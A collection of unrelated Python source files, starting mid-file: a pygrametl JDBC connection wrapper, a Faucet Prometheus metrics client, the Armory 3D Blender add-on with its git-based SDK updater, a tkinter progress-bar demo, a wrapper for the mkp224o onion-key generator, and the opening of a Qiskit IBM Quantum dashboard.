        # (JDBC column indexes are 1-based).
        meta = resultset.getMetaData()
        names = []
        types = []
        for col in range(meta.getColumnCount()):
            names.append(meta.getColumnName(col + 1))
            types.append(meta.getColumnType(col + 1))
        return (names, types)

    def __readresultrow(self):
        # Convert the current ResultSet row into a tuple of Python values,
        # picking a type-appropriate getter for each column.
        if self.__resultset is None:
            return None
        result = []
        for i in range(len(self.__resulttypes)):
            e = self.__resulttypes[i]  # Not Pythonic, but we need i for JDBC
            if e in (jdbc.Types.CHAR, jdbc.Types.VARCHAR,
                     jdbc.Types.LONGVARCHAR):
                result.append(self.__resultset.getString(i + 1))
            elif e in (jdbc.Types.BIT, jdbc.Types.BOOLEAN):
                # BUG FIX: java.sql.ResultSet defines getBoolean, not
                # getBool; the old getBool call raised an AttributeError.
                result.append(self.__resultset.getBoolean(i + 1))
            elif e in (jdbc.Types.TINYINT, jdbc.Types.SMALLINT,
                       jdbc.Types.INTEGER):
                result.append(self.__resultset.getInt(i + 1))
            elif e in (jdbc.Types.BIGINT, ):
                result.append(self.__resultset.getLong(i + 1))
            elif e in (jdbc.Types.DATE, ):
                result.append(self.__resultset.getDate(i + 1))
            elif e in (jdbc.Types.TIMESTAMP, ):
                result.append(self.__resultset.getTimestamp(i + 1))
            elif e in (jdbc.Types.TIME, ):
                result.append(self.__resultset.getTime(i + 1))
            else:
                # Try this and hope for the best...
                result.append(self.__resultset.getString(i + 1))
        return tuple(result)

    def execute(self, stmt, arguments=None, namemapping=None, ignored=None):
        """Execute a statement.

        Arguments:
        - stmt: the statement to execute
        - arguments: a mapping with the arguments. Default: None.
        - namemapping: a mapping of names such that if stmt uses %(arg)s
          and namemapping[arg]=arg2, the value arguments[arg2] is used
          instead of arguments[arg]
        - ignored: An ignored argument only present to accept the same
          number of arguments as ConnectionWrapper.execute
        """
        if namemapping and arguments:
            arguments = pygrametl.copy(arguments, **namemapping)
        else:
            # Copy so later caller-side mutation can't affect the deferred
            # execution on the worker thread.
            arguments = pcopy(arguments)
        self.__queue.put((stmt, arguments))

    def executemany(self, stmt, params, ignored=None):
        """Execute a sequence of statements.

        Arguments:
        - stmt: the statement to execute
        - params: a sequence of arguments
        - ignored: An ignored argument only present to accept the same
          number of arguments as ConnectionWrapper.executemany
        """
        for paramset in params:
            self.__queue.put((stmt, paramset))

    def rowfactory(self, names=None):
        """Return a generator object returning result rows (i.e. dicts)."""
        # Wait for all queued statements before reading results.
        self.__queue.join()
        if names is None:
            if self.__resultnames is None:
                return
            else:
                names = [self.nametranslator(t) for t in self.__resultnames]
        empty = (None, ) * len(self.__resultnames)
        while True:
            datatuple = self.fetchonetuple()
            if datatuple == empty:
                return
            yield dict(zip(names, datatuple))

    def fetchone(self, names=None):
        """Return one result row (i.e. dict)."""
        self.__queue.join()
        if self.__resultset is None:
            return {}
        if names is None:
            names = [self.nametranslator(t) for t in self.__resultnames]
        values = self.fetchonetuple()
        return dict(zip(names, values))

    def fetchonetuple(self):
        """Return one result tuple (all-None when exhausted)."""
        self.__queue.join()
        if self.__resultset is None:
            return ()
        if not self.__resultset.next():
            return (None, ) * len(self.__resultnames)
        else:
            return self.__readresultrow()

    def fetchmanytuples(self, cnt):
        """Return at most cnt result tuples."""
        self.__queue.join()
        if self.__resultset is None:
            return []
        empty = (None, ) * len(self.__resultnames)
        result = []
        for _ in range(cnt):
            tmp = self.fetchonetuple()
            if tmp == empty:
                break
            result.append(tmp)
        return result

    def fetchalltuples(self):
        """Return all result tuples"""
        self.__queue.join()
        if self.__resultset is None:
            return []
        result = []
        empty = (None, ) * len(self.__resultnames)
        while True:
            tmp = self.fetchonetuple()
            if tmp == empty:
                return result
            result.append(tmp)

    def rowcount(self):
        """Not implemented. Return 0. Should return the size of the result."""
        return 0

    def getunderlyingmodule(self):
        """Return a reference to the underlying connection's module."""
        return modules[self.__class__.__module__]

    def commit(self):
        """Commit the transaction."""
        pygrametl.endload()
        self.__queue.join()
        self.__jdbcconn.commit()

    def close(self):
        """Close the connection to the database,"""
        if pygrametl._defaulttargetconnection is self:
            pygrametl._defaulttargetconnection = None
        self.__queue.join()
        self.__jdbcconn.close()

    def rollback(self):
        """Rollback the transaction."""
        self.__queue.join()
        self.__jdbcconn.rollback()

    def setasdefault(self):
        """Set this ConnectionWrapper as the default connection."""
        pygrametl._defaulttargetconnection = self

    def cursor(self):
        """Not implemented for this JDBC connection wrapper!"""
        raise NotImplementedError(".cursor() not supported")

    def resultnames(self):
        """Return a tuple of the current result's column names, or None."""
        self.__queue.join()
        if self.__resultnames is None:
            return None
        else:
            return tuple(self.__resultnames)
def Date(year, month, day):
    """Build a java.sql.Date from numeric year/month/day values."""
    # valueOf expects an ISO 'yyyy-mm-dd' string; zero-pad each part.
    iso = '-'.join((str(year).zfill(4), str(month).zfill(2), str(day).zfill(2)))
    return jdbc.Date.valueOf(iso)
def Timestamp(year, month, day, hour, minute, second):
    """Build a java.sql.Timestamp from numeric date and time parts."""
    # valueOf expects 'yyyy-mm-dd hh:mm:ss'; zero-pad every component.
    datepart = '-'.join(
        (str(year).zfill(4), str(month).zfill(2), str(day).zfill(2)))
    timepart = ':'.join(
        (str(hour).zfill(2), str(minute).zfill(2), str(second).zfill(2)))
    return jdbc.Timestamp.valueOf(datepart + ' ' + timepart)
|
prom_client.py
|
"""Implement Prometheus client."""
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2015 Brad Cowie, Christopher Lorier and Joe Stringer.
# Copyright (C) 2015 Research and Education Advanced Network New Zealand Ltd.
# Copyright (C) 2015--2019 The Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from urllib.parse import parse_qs
from ryu.lib import hub
from pbr.version import VersionInfo
from prometheus_client import Gauge as PromGauge
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST, REGISTRY
# Ryu's WSGI implementation doesn't always set QUERY_STRING
def make_wsgi_app(registry):
    """Create a WSGI app which serves the metrics from a registry.

    Arguments:
    - registry: a prometheus_client CollectorRegistry to export.
    Returns a WSGI callable producing text in Prometheus exposition format.
    """
    def prometheus_app(environ, start_response):
        # Ryu's WSGI implementation doesn't always set QUERY_STRING.
        query_str = environ.get('QUERY_STRING', '')
        params = parse_qs(query_str)
        reg = registry
        if 'name[]' in params:
            # Restrict output to the metric names explicitly requested.
            reg = reg.restricted_registry(params['name[]'])
        output = generate_latest(reg)
        # Python-2-era str() wrappers removed: these are native str already.
        status = '200 OK'
        headers = [('Content-type', CONTENT_TYPE_LATEST)]
        start_response(status, headers)
        return [output]
    return prometheus_app
class PromClient: # pylint: disable=too-few-public-methods
    """Prometheus client."""
    # Label names every exported metric is expected to carry.
    REQUIRED_LABELS = ['dp_id', 'dp_name']
    # Class-level default registry; shadowed per instance when reg is given.
    _reg = REGISTRY
    def __init__(self, reg=None):
        # Allow callers (e.g. tests) to supply their own registry instead
        # of the process-global REGISTRY.
        if reg is not None:
            self._reg = reg
        # TODO: investigate faster alternative (https://bugs.launchpad.net/pbr/+bug/1688405)
        self.version = VersionInfo('faucet').semantic_version().release_string()
        # Export the running version as a constant gauge set to 1.
        self.faucet_version = PromGauge( # pylint: disable=unexpected-keyword-arg
            'faucet_pbr_version',
            'Faucet PBR version',
            ['version'],
            registry=self._reg)
        self.faucet_version.labels(version=self.version).set(1) # pylint: disable=no-member
        self.server = None
        self.thread = None
    def start(self, prom_port, prom_addr, use_test_thread=False):
        """Start webserver.

        Arguments:
        - prom_port: TCP port to listen on (int or numeric string)
        - prom_addr: address to bind
        - use_test_thread: serve via wsgiref on a plain thread instead of
          Ryu's hub (used by tests). Default: False.
        Idempotent: does nothing if the server was already started.
        """
        if not self.server:
            app = make_wsgi_app(self._reg)
            if use_test_thread:
                # pylint: disable=import-outside-toplevel
                from wsgiref.simple_server import (
                    make_server, WSGIRequestHandler)
                import threading
                class NoLoggingWSGIRequestHandler(WSGIRequestHandler):
                    """Don't log requests."""
                    def log_message(self, *_args): # pylint: disable=arguments-differ
                        pass
                self.server = make_server(
                    prom_addr, int(prom_port), app, handler_class=NoLoggingWSGIRequestHandler)
                self.thread = threading.Thread(target=self.server.serve_forever)
                self.thread.daemon = True
                self.thread.start()
            else:
                self.server = hub.WSGIServer((prom_addr, int(prom_port)), app)
                self.thread = hub.spawn(self.server.serve_forever)
            self.thread.name = 'prometheus'
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
# Blender add-on metadata shown in the Add-ons preferences panel.
bl_info = {
    "name": "Armory",
    "category": "Render",
    "location": "Properties -> Render -> Armory Player",
    "description": "3D Game Engine for Blender",
    "author": "Armory3D.org",
    "version": (0, 6, 0),
    "blender": (2, 80, 0),
    "wiki_url": "http://armory3d.org/manual",
    "tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
    """Return a short OS tag: 'win', 'mac', or 'linux' (the fallback)."""
    system = platform.system()
    if system == 'Windows':
        return 'win'
    if system == 'Darwin':
        return 'mac'
    # Anything else (Linux, BSDs, ...) is treated as linux.
    return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
    """Add-on preferences panel: SDK location, updater and advanced options."""
    bl_idname = __name__
    def sdk_path_update(self, context):
        """Normalize the SDK path to an absolute path ending in '/'."""
        # skip_update guards against the recursive update triggered by
        # assigning self.sdk_path below.
        if self.skip_update:
            return
        self.skip_update = True
        self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
    def ffmpeg_path_update(self, context):
        """Normalize the FFMPEG binary path to an absolute path."""
        if self.skip_update or self.ffmpeg_path == '':
            return
        self.skip_update = True
        self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
    def renderdoc_path_update(self, context):
        """Normalize the RenderDoc binary path to an absolute path."""
        if self.skip_update:
            return
        self.skip_update = True
        self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
    sdk_bundled: BoolProperty(name="Bundled SDK", default=True)
    sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
    show_advanced: BoolProperty(name="Show Advanced", default=False)
    player_gapi_win: EnumProperty(
        items = [('direct3d11', 'Auto', 'direct3d11'),
                 ('opengl', 'OpenGL', 'opengl'),
                 ('direct3d11', 'Direct3D11', 'direct3d11')],
        name="Player Graphics API", default='direct3d11', description='Use this graphics API when launching the game in Krom player(F5)')
    player_gapi_linux: EnumProperty(
        items = [('opengl', 'Auto', 'opengl'),
                 ('opengl', 'OpenGL', 'opengl')],
        name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
    player_gapi_mac: EnumProperty(
        items = [('opengl', 'Auto', 'opengl'),
                 ('opengl', 'OpenGL', 'opengl')],
        name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
    code_editor: EnumProperty(
        items = [('kodestudio', 'Kode Studio', 'kodestudio'),
                 ('default', 'System Default', 'default')],
        name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
    ui_scale: FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
    khamake_threads: IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
    renderdoc_path: StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
    ffmpeg_path: StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
    save_on_build: BoolProperty(name="Save on Build", description="Save .blend", default=False)
    legacy_shaders: BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
    relative_paths: BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
    viewport_controls: EnumProperty(
        items=[('qwerty', 'qwerty', 'qwerty'),
               ('azerty', 'azerty', 'azerty')],
        name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
    # Internal flag used by the *_update callbacks to break recursion.
    skip_update: BoolProperty(name="", default=False)
    def draw(self, context):
        """Draw the preferences UI (SDK path, updater, advanced options)."""
        self.skip_update = False
        layout = self.layout
        layout.label(text="Welcome to Armory! Click 'Save Preferences' at the bottom to keep Armory enabled.")
        # Only offer the "bundled SDK" toggle if a bundled SDK exists.
        p = bundled_sdk_path()
        if os.path.exists(p):
            layout.prop(self, "sdk_bundled")
            if not self.sdk_bundled:
                layout.prop(self, "sdk_path")
        else:
            layout.prop(self, "sdk_path")
        box = layout.box().column()
        box.label(text="Armory Updater")
        box.label(text="Note: Development version may run unstable!")
        row = box.row(align=True)
        row.alignment = 'EXPAND'
        row.operator("arm_addon.help", icon="URL")
        row.operator("arm_addon.update", icon="FILE_REFRESH")
        row.operator("arm_addon.restore")
        box.label(text="Check console for download progress. Please restart Blender after successful SDK update.")
        layout.prop(self, "show_advanced")
        if self.show_advanced:
            box = layout.box().column()
            # Show only the graphics-API option relevant to this platform.
            box.prop(self, "player_gapi_" + get_os())
            box.prop(self, "code_editor")
            box.prop(self, "renderdoc_path")
            box.prop(self, "ffmpeg_path")
            box.prop(self, "viewport_controls")
            box.prop(self, "ui_scale")
            box.prop(self, "khamake_threads")
            box.prop(self, "save_on_build")
            box.prop(self, "legacy_shaders")
            box.prop(self, "relative_paths")
def bundled_sdk_path():
    """Return the path where an SDK bundled with Blender would live."""
    if get_os() == 'mac':
        # SDK on MacOS is located in .app folder due to security
        p = bpy.app.binary_path
        if p.endswith('Contents/MacOS/blender'):
            return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
        else:
            return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
    elif get_os() == 'linux':
        # Binary path ends in /blender; SDK sits next to the executable.
        return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
    else:
        # Binary path ends in /blender.exe; normalize backslashes first.
        return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
    """Return the directory of the current .blend file ('' if unsaved)."""
    filepath = bpy.data.filepath
    if filepath == '':
        return ''
    # Drop the file name, keep the containing directory.
    parts = filepath.split(os.path.sep)
    return os.path.sep.join(parts[:-1])
def get_sdk_path(context):
    """Resolve the SDK directory to use, in priority order:
    project-local ./armsdk, then the bundled SDK (if enabled in the
    preferences), then the user-configured path."""
    preferences = context.preferences
    addon_prefs = preferences.addons["armory"].preferences
    p = bundled_sdk_path()
    if os.path.exists(get_fp() + '/armsdk'):
        return get_fp() + '/armsdk'
    elif os.path.exists(p) and addon_prefs.sdk_bundled:
        return p
    else:
        return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
    """shutil.rmtree onerror handler: make *path* writable and retry *func*."""
    # Read-only files (common on Windows checkouts) block removal; lift
    # the flag, then retry the failed os function.
    os.chmod(path, stat.S_IWRITE)
    func(path)
def run_proc(cmd, done):
    """Start *cmd* as a subprocess and call *done* when it finishes.

    Arguments:
    - cmd: argument list passed to subprocess.Popen
    - done: zero-argument callable invoked from a watcher thread once the
      process exits, or None for fire-and-forget
    Returns the Popen object immediately (does not block).
    """
    def fn(p, done):
        p.wait()
        if done is not None:  # fixed: identity check, not '!= None' (PEP 8)
            done()
    p = subprocess.Popen(cmd)
    threading.Thread(target=fn, args=(p, done)).start()
    return p
def git_clone(done, p, gitn, n, recursive=False):
    """Shallow-clone GitHub repo *gitn* into p/n, backing up any old copy.

    Arguments:
    - done: completion callback forwarded to run_proc
    - p: base directory (the SDK root)
    - gitn: 'owner/repo' part of the GitHub URL
    - n: target subdirectory name under p
    - recursive: also clone submodules (shallow). Default: False.
    """
    # Keep a one-time backup of the existing checkout (restore_repo undoes
    # this); if a backup already exists, the current checkout is discarded.
    if not os.path.exists(p + '/' + n + '_backup'):
        os.rename(p + '/' + n, p + '/' + n + '_backup')
    if os.path.exists(p + '/' + n):
        shutil.rmtree(p + '/' + n, onerror=remove_readonly)
    if recursive:
        run_proc(['git', 'clone', '--recursive', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1', '--shallow-submodules', '--jobs', '4'], done)
    else:
        run_proc(['git', 'clone', 'https://github.com/' + gitn, p + '/' + n, '--depth', '1'], done)
def restore_repo(p, n):
    """Put the backed-up copy of repo *n* under *p* back in place, if any."""
    backup = p + '/' + n + '_backup'
    current = p + '/' + n
    if os.path.exists(backup):
        # Remove whatever replaced the backup before renaming it back.
        if os.path.exists(current):
            shutil.rmtree(current, onerror=remove_readonly)
        os.rename(backup, current)
class ArmAddonStartButton(bpy.types.Operator):
    '''Start Armory integration'''
    bl_idname = "arm_addon.start"
    bl_label = "Start"
    # Class-level flag so on_load_post can avoid a second start.
    running = False
    def execute(self, context):
        """Import and register the SDK's 'start' module."""
        sdk_path = get_sdk_path(context)
        if sdk_path == "":
            print("Configure Armory SDK path first")
            return {"CANCELLED"}
        # Make the SDK's Blender scripts importable before 'import start'.
        scripts_path = sdk_path + "/armory/blender/"
        sys.path.append(scripts_path)
        local_sdk = os.path.exists(get_fp() + '/armsdk')
        import start
        start.register(local_sdk=local_sdk)
        ArmAddonStartButton.running = True
        return {"FINISHED"}
class ArmAddonStopButton(bpy.types.Operator):
    '''Stop Armory integration'''
    bl_idname = "arm_addon.stop"
    bl_label = "Stop"
    def execute(self, context):
        """Unregister the SDK's 'start' module and clear the running flag."""
        import start
        start.unregister()
        ArmAddonStartButton.running = False
        return {"FINISHED"}
class ArmAddonUpdateButton(bpy.types.Operator):
    '''Update Armory SDK'''
    bl_idname = "arm_addon.update"
    bl_label = "Update SDK"
    bl_description = "Update to the latest development version"
    def execute(self, context):
        """Shallow-clone all nine SDK repositories in parallel."""
        sdk_path = get_sdk_path(context)
        if sdk_path == "":
            self.report({"ERROR"}, "Configure Armory SDK path first")
            return {"CANCELLED"}
        self.report({'INFO'}, 'Updating Armory SDK, check console for details.')
        print('Armory (add-on v' + str(bl_info['version']) + '): Cloning [armory, iron, haxebullet, haxerecast, zui] repositories')
        os.chdir(sdk_path)
        # Shared counters used by the done() callback below to announce
        # completion once all clones have finished.
        global repos_updated
        global repos_total
        repos_updated = 0
        repos_total = 9  # must match the number of git_clone calls below
        def done():
            global repos_updated
            global repos_total
            repos_updated += 1
            if repos_updated == repos_total:
                print('Armory SDK updated, please restart Blender')
        git_clone(done, sdk_path, 'armory3d/armory', 'armory')
        git_clone(done, sdk_path, 'armory3d/iron', 'iron')
        git_clone(done, sdk_path, 'armory3d/haxebullet', 'lib/haxebullet')
        git_clone(done, sdk_path, 'armory3d/haxerecast', 'lib/haxerecast')
        git_clone(done, sdk_path, 'armory3d/zui', 'lib/zui')
        git_clone(done, sdk_path, 'armory3d/armory_tools', 'lib/armory_tools')
        git_clone(done, sdk_path, 'armory3d/iron_format', 'lib/iron_format')
        git_clone(done, sdk_path, 'armory3d/Krom_bin', 'Krom')
        git_clone(done, sdk_path, 'armory3d/Kha', 'Kha', recursive=True)
        return {"FINISHED"}
class ArmAddonRestoreButton(bpy.types.Operator):
    '''Update Armory SDK'''
    bl_idname = "arm_addon.restore"
    bl_label = "Restore SDK"
    bl_description = "Restore stable version"
    def execute(self, context):
        """Undo an SDK update by renaming the *_backup copies back."""
        sdk_path = get_sdk_path(context)
        if sdk_path == "":
            self.report({"ERROR"}, "Configure Armory SDK path first")
            return {"CANCELLED"}
        os.chdir(sdk_path)
        restore_repo(sdk_path, 'armory')
        restore_repo(sdk_path, 'iron')
        restore_repo(sdk_path, 'lib/haxebullet')
        restore_repo(sdk_path, 'lib/haxerecast')
        restore_repo(sdk_path, 'lib/zui')
        restore_repo(sdk_path, 'lib/armory_tools')
        restore_repo(sdk_path, 'lib/iron_format')
        restore_repo(sdk_path, 'Kha')
        restore_repo(sdk_path, 'Krom')
        self.report({'INFO'}, 'Restored stable version')
        return {"FINISHED"}
class ArmAddonHelpButton(bpy.types.Operator):
    '''Updater help'''
    bl_idname = "arm_addon.help"
    bl_label = "Help"
    bl_description = "Git is required for Armory Updater to work"
    def execute(self, context):
        """Open the updater documentation in the system browser."""
        webbrowser.open('https://armory3d.org/manual/#/dev/gitversion')
        return {"FINISHED"}
@persistent
def on_load_post(context):
    """load_post handler: (re)start Armory after a .blend file is loaded."""
    if ArmAddonStartButton.running:
        return
    bpy.ops.arm_addon.start()
def register():
    """Register all add-on classes and the load_post handler with Blender."""
    bpy.utils.register_class(ArmoryAddonPreferences)
    bpy.utils.register_class(ArmAddonStartButton)
    bpy.utils.register_class(ArmAddonStopButton)
    bpy.utils.register_class(ArmAddonUpdateButton)
    bpy.utils.register_class(ArmAddonRestoreButton)
    bpy.utils.register_class(ArmAddonHelpButton)
    bpy.app.handlers.load_post.append(on_load_post)
def unregister():
    """Stop the integration, then unregister classes and handlers."""
    bpy.ops.arm_addon.stop()
    bpy.utils.unregister_class(ArmoryAddonPreferences)
    bpy.utils.unregister_class(ArmAddonStartButton)
    bpy.utils.unregister_class(ArmAddonStopButton)
    bpy.utils.unregister_class(ArmAddonUpdateButton)
    bpy.utils.unregister_class(ArmAddonRestoreButton)
    bpy.utils.unregister_class(ArmAddonHelpButton)
    bpy.app.handlers.load_post.remove(on_load_post)
# Allow running the add-on script directly from Blender's text editor.
if __name__ == "__main__":
    register()
|
progress_bar.py
|
import sys
sys.path.append('../../lib')
from UI import *
from tkinter import filedialog
import time
import threading
# File-type filters offered by the open-file dialog.
FILE_TYPES=[('PDF files', '.pdf'),
            ('JPG files', '.jpg'),
            ('PNG files', '.png'),
            ('Py files', '*.py'),
            ('all files', '.*')]
# Handle of the worker thread started by the button callback (None = idle).
cb_thread=None
def open_folder():
    """Ask the user to pick a directory and print the selection."""
    # NOTE(review): main() assigns 'root' as a local without a global
    # declaration, so this lookup may fail at runtime -- verify.
    global root
    rep = filedialog.askdirectory(
        parent=root.object,
        initialdir=os.getcwd())
    print(rep)
def open_file():
    """Ask the user to pick file(s) and print the first selected path."""
    global root
    rep = filedialog.askopenfilenames(parent=root.object, initialdir=os.getcwd(), filetypes=FILE_TYPES)
    # askopenfilenames returns an empty tuple when the dialog is cancelled;
    # guard it instead of crashing with IndexError on rep[0].
    if rep:
        print(rep[0])
def callback_func_threaded():
    """Run callback_func on a worker thread so the UI stays responsive."""
    # BUG FIX: without 'global', cb_thread was a local variable, so the
    # module-level handle stayed None and main() could never join it.
    global cb_thread
    cb_thread = threading.Thread(target=callback_func)
    cb_thread.start()
def callback_func():
    """Animate the progress bar for ~10 seconds, then stop and clear
    the module-level thread handle."""
    global obj_progress, cb_thread
    obj_progress.start()
    for i in range(10):
        time.sleep(1)
        print(str(i)+"\n")
    obj_progress.stop()
    # Mark the worker as finished so main()'s shutdown check skips it.
    cb_thread=None
def main():
    """Build the demo window: a progress bar plus a start button."""
    # BUG FIX: 'root' must be global so open_folder/open_file (which
    # declare 'global root') can reach the window object.
    global obj_progress, ui_exit, root
    root = BEGIN()
    root.title("demo")
    root.dimension(500,300)
    #root.bg('#555')
    root.gotoxy(200,100)
    obj_progress = progress_bar(root)
    obj_progress.dimension(200,10)
    obj_progress.speed(1)
    obj_progress.gotoxy(100,100)
    b = button(root)
    b.dimension(20,10)
    b.gotoxy(100, 40)
    b.write("start")
    b.callback(callback_func_threaded)
    #obj.update(1)
    #bj.vertical()
    #obj.disable()
    #obj.enable()
    END(root)
    if cb_thread:
        # BUG FIX: threading.Thread has no exit() method; just wait for
        # the worker to finish before hard-exiting the process.
        cb_thread.join()
    os._exit(0)
main()
|
__init__.py
|
"Python wrapper for mkp224o CLI tool."
import os
import time
import threading
from collections import defaultdict
from queue import Queue, Empty
from subprocess import Popen, PIPE, TimeoutExpired
from .version import __version__
COMMAND = os.getenv('MKP224O_PATH', 'mkp224o')
class _Mkpy224o: # pylint: disable=too-few-public-methods
    """Run the mkp224o CLI for one pattern and parse its output."""
    def __init__(self, pattern, on_progress=None):
        # pattern: onion-address prefix to brute-force (base32 alphabet).
        self._pattern = pattern
        # Expected search-space size: 32 possibilities per pattern char.
        self._total_calcs = pow(32, len(pattern))
        # Optional callback receiving averaged progress statistics.
        self._on_progress = on_progress
        self._stats_reports = 0
        self._stats = defaultdict(lambda: 0)
        self._start = time.time()
    def _update_stats(self, stats):
        """Fold one stderr stats report into running averages and return
        averages plus elapsed/estimate/remaining timings."""
        # Update totals.
        self._stats_reports += 1
        for key, value in stats.items():
            self._stats[key] += value
        # Find averages.
        averages = {}
        for key in ('calc/sec', 'succ/sec', 'rest/sec'):
            averages[key] = self._stats[key] / self._stats_reports
        averages['elapsed'] = time.time() - self._start
        # Estimate time.
        averages['estimate'] = self._total_calcs / averages['calc/sec']
        averages['remaining'] = averages['estimate'] - averages['elapsed']
        return averages
    def _tail_stderr(self, stream):
        """Follow mkp224o's stderr on a daemon thread, parsing the
        '>key:value, ...' progress lines and reporting via on_progress."""
        def _tail():
            while True:
                try:
                    line = stream.readline()
                except ValueError:
                    # Stream closed underneath us; stop tailing.
                    break
                if line == '':
                    break
                # Only '>'-prefixed lines carry statistics.
                if not line.startswith('>'):
                    continue
                line = line.strip().lstrip('>').rstrip('sec')
                stats = {
                    k: float(v) for k, v in [
                        p.split(':') for p in line.split(', ')
                    ]
                }
                stats = self._update_stats(stats)
                self._on_progress(stats)
        threading.Thread(target=_tail, daemon=True).start()
    def __call__(self, count=1, interval=3):
        """Run mkp224o until *count* keys are found; return a list of
        dicts with 'hostname', 'public' and 'secret' entries."""
        cmd, keys = [
            COMMAND, self._pattern, '-n', str(count), '-S', str(interval), '-y',
        ], []
        with Popen(cmd, stdout=PIPE, stderr=PIPE, encoding='utf8') as proc:
            self._tail_stderr(proc.stderr)
            # Poll instead of blocking so the tail thread keeps draining.
            while True:
                try:
                    proc.wait(0.1)
                except TimeoutExpired:
                    continue
                else:
                    break
            # Parse our keys.
            lines = iter(proc.stdout.read().split('\n'))
            while True:
                # Each key record starts with a '---' separator line.
                header = next(lines)
                if header != '---':
                    break
                args = {
                    'hostname': next(lines).split()[1],
                    'public': next(lines).split()[1],
                    'secret': next(lines).split()[1],
                }
                # Sanity check.
                assert next(lines).startswith('time:')
                keys.append(args)
        return keys
def find_keys(pattern, count=1, on_progress=None, interval=None):
    """
    Main interface for this module.

    Args:
        pattern: prefix the generated onion address must match.
        count: number of keys to generate.
        on_progress: optional callback receiving averaged progress stats.
        interval: seconds between progress reports; ``None`` means 3.

    Returns:
        List of dicts with ``hostname``, ``public`` and ``secret`` entries.
    """
    # BUG FIX: previously interval=None was forwarded verbatim and ended up
    # on the mkp224o command line as the literal string "None".
    if interval is None:
        interval = 3
    return _Mkpy224o(pattern, on_progress=on_progress)(count, interval)
|
dashboard.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The core IBM Quantum dashboard launcher."""
import threading
from typing import List, Tuple, Dict, Any, Optional
import ipywidgets as wid
from IPython.core.magic import line_magic, Magics, magics_class
from IPython.display import display, Javascript
from qiskit.exceptions import QiskitError
from qiskit.tools.events.pubsub import Subscriber
from qiskit_ibm_provider.job.exceptions import IBMJobApiError
from qiskit_ibm_provider.job.ibm_job import IBMJob
from .backend_update import update_backend_info
from .backend_widget import make_backend_widget
from .job_widgets import make_clear_button, make_labels, create_job_widget
from .utils import BackendWithProviders
from .watcher_monitor import _job_monitor
from ... import IBMProvider
class AccordionWithThread(wid.Accordion):
    """An ``Accordion`` that will close an attached thread."""
    def __init__(self, children: Optional[List] = None, **kwargs: Any):
        """AccordionWithThread constructor.
        Args:
            children: A list of widgets to be attached to the accordion.
            **kwargs: Additional keywords to be passed to ``ipywidgets.Accordion``.
        """
        children = children or []
        super().__init__(children=children, **kwargs)
        # Background updater thread; attached later by the dashboard.
        self._thread = None
        # Devices VBox.
        self._device_list = None  # type: Optional[wid.VBox]
    def __del__(self):
        """Object disposal."""
        # hasattr guard: __del__ may run even if __init__ failed part-way.
        if hasattr(self, "_thread"):
            try:
                # The updater loop checks this flag and exits cooperatively.
                self._thread.do_run = False
                self._thread.join()
            except Exception:  # pylint: disable=broad-except
                pass
        self.close()
def _add_device_to_list(backend: BackendWithProviders, device_list: wid.VBox) -> None:
    """Append a widget pane for *backend* to the *device_list* container.

    Args:
        backend: Backend to add.
        device_list: Widget showing the devices.
    """
    pane = make_backend_widget(backend)
    updated = list(device_list.children)
    updated.append(pane)
    device_list.children = updated
class IBMDashboard(Subscriber):
    """An IBM Quantum dashboard.
    This dashboard shows both device and job information.
    """
    def __init__(self):
        """IBM Quantum Dashboard constructor."""
        super().__init__()
        # A list of job widgets. Each represents a job and has 5 children:
        # close button, Job ID, backend, status, and estimated start time.
        self.jobs = [] # type: List
        self._init_subscriber()
        self.provider = None
        self.dashboard = None # type: Optional[AccordionWithThread]
        # Backend dictionary. The keys are the backend names and the values
        # are named tuples of ``IBMBackend`` instances and a list of provider names.
        self.backend_dict = None # type: Optional[Dict[str, BackendWithProviders]]
        # Jobs tab on the dashboard.
        self.job_viewer = None # type: Optional[wid.VBox]
        self._clear_jobs_button = make_clear_button(self) # type: wid.GridBox
